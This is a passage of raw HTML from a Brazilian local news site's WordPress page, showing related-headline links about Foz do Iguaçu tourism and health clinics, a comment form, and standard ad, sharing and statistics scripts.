		<a href="http://oiguassu.com/movimento-de-turistas-cresceu-1623-em-foz-do-iguacu/" title="Movimento de turistas cresceu 16,23% em Foz do Iguaçu"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/10/1-11-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/10/1-11-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/10/1-11-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/10/1-11-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/10/1-11-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="3987" data-permalink="http://oiguassu.com/movimento-de-turistas-cresceu-1623-em-foz-do-iguacu/1-68/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/10/1-11.jpg" data-orig-size="549,366" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/10/1-11-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/10/1-11.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/movimento-de-turistas-cresceu-1623-em-foz-do-iguacu/" title="Movimento de turistas cresceu 16,23% em Foz do Iguaçu" rel="bookmark">
			Movimento de turistas cresceu 16,23% em Foz do Iguaçu		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-4395 post type-post status-publish format-standard hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/medicos-especialistas-atendem-cerca-de-10-mil-pacientes-por-mes-na-rede-municipal/" title="MÉDICOS ESPECIALISTAS ATENDEM CERCA DE 10 MIL PACIENTES POR MÊS NA REDE MUNICIPAL"><img class="mh-image-placeholder" src="http://oiguassu.com/wp-content/themes/mh_newsdesk/images/placeholder-content-grid.jpg" alt="No Picture" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/medicos-especialistas-atendem-cerca-de-10-mil-pacientes-por-mes-na-rede-municipal/" title="MÉDICOS ESPECIALISTAS ATENDEM CERCA DE 10 MIL PACIENTES POR MÊS NA REDE MUNICIPAL" rel="bookmark">
			MÉDICOS ESPECIALISTAS ATENDEM CERCA DE 10 MIL PACIENTES POR MÊS NA REDE MUNICIPAL		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-3135 post type-post status-publish format-standard hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/cerimonia-de-inauguracao-da-upa-do-morumbi-sera-realizada-no-sabado-30/" title="CERIMÔNIA DE INAUGURAÇÃO DA UPA DO MORUMBI SERÁ REALIZADA NO SÁBADO (30)"><img class="mh-image-placeholder" src="http://oiguassu.com/wp-content/themes/mh_newsdesk/images/placeholder-content-grid.jpg" alt="No Picture" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/cerimonia-de-inauguracao-da-upa-do-morumbi-sera-realizada-no-sabado-30/" title="CERIMÔNIA DE INAUGURAÇÃO DA UPA DO MORUMBI SERÁ REALIZADA NO SÁBADO (30)" rel="bookmark">
			CERIMÔNIA DE INAUGURAÇÃO DA UPA DO MORUMBI SERÁ REALIZADA NO SÁBADO (30)		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-3665 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/em-menos-de-uma-semana-upa-do-morumbi-atendeu-mais-de-1700-pessoas/" title="EM MENOS DE UMA SEMANA UPA DO MORUMBI ATENDEU MAIS DE 1700 PESSOAS"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/10/3-7-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/10/3-7-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/10/3-7-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/10/3-7-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/10/3-7-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="3666" data-permalink="http://oiguassu.com/em-menos-de-uma-semana-upa-do-morumbi-atendeu-mais-de-1700-pessoas/3-62/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/10/3-7.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="3" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/10/3-7-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/10/3-7.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/em-menos-de-uma-semana-upa-do-morumbi-atendeu-mais-de-1700-pessoas/" title="EM MENOS DE UMA SEMANA UPA DO MORUMBI ATENDEU MAIS DE 1700 PESSOAS" rel="bookmark">
			EM MENOS DE UMA SEMANA UPA DO MORUMBI ATENDEU MAIS DE 1700 PESSOAS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5%"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='10930' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="f8555a8b5a" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="108"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5\/":10930};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201839'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Sepaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.2'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201839.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.2',blog:'12891280',post:'10930',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '10930' ]);
</script>
</body>
</html>